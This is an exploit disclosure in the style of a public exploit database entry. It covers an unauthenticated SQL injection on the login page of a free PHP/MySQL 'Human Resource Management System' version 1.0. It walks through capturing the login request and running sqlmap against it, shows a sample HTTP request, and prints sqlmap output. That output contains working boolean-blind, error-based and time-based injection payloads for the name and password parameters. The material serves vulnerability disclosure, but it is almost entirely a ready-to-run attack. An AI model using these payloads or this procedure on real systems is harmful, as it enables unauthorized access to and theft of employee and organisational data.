# Exploit Title: Human Resource Management System - SQL Injection (unauthenticated)
# Date: 08-11-2022
# Exploit Author: Matthijs van der Vaart (eMVee)
# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
# Version: 1.0 (Monday, October 10, 2022 - 13:37)
# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0

1) Capture the login POST request with Burp Suite or OWASP ZAP

2) Save the request as "login.req"

3) Run sqlmap as follows: "sqlmap -r login.req"

Example login.req

==========

POST /controller/login.php HTTP/1.1

Host: target

Cookie: csrf_token_f58f5b43e3803b8c3c224afd706cf0f9927d9fd3c222740171d746d078b1ac9b=h1qG45IggxzwQ/i1lH2zBF7ktvDJT716RNl59LQTkwk=; PHPSESSID=kg0h3kpsbf2r3mnmbmmap2afda

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 66

Origin: https://target

Referer: https://target/index.php<https://10.0.2.15/dashboard/hrm/index.php>

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

Te: trailers

Connection: close

name=admin%40gmail.com&password=password+&submit=Sign+In


=========


Output example SQL Injection unauthenticated login page


==========

POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

sqlmap identified the following injection point(s) with a total of 1143 HTTP(s) requests:

---

Parameter: password (POST)

Type: boolean-based blind

Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: [email protected]&password=password ' RLIKE (SELECT (CASE WHEN (7213=7213) THEN 0x70617373776f726420 ELSE 0x28 END))-- ylOf&submit=Sign In

Type: error-based

Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: [email protected]&password=password ' OR (SELECT 8513 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(8513=8513,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RBnO&submit=Sign In

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: [email protected]&password=password ' AND (SELECT 4404 FROM (SELECT(SLEEP(5)))eQTb)-- NTCP&submit=Sign In

Parameter: name (POST)

Type: boolean-based blind

Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: [email protected]' RLIKE (SELECT (CASE WHEN (2620=2620) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- KlrV&password=password &submit=Sign In

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: [email protected]' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7287=7287,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fSRz&password=password &submit=Sign In

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: [email protected]' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))NCtJ)-- ennA&password=password &submit=Sign In

---

there were multiple injection points, please select the one to use for following injections:

[0] place: POST, parameter: name, type: Single quoted string (default)

[1] place: POST, parameter: password, type: Single quoted string

==========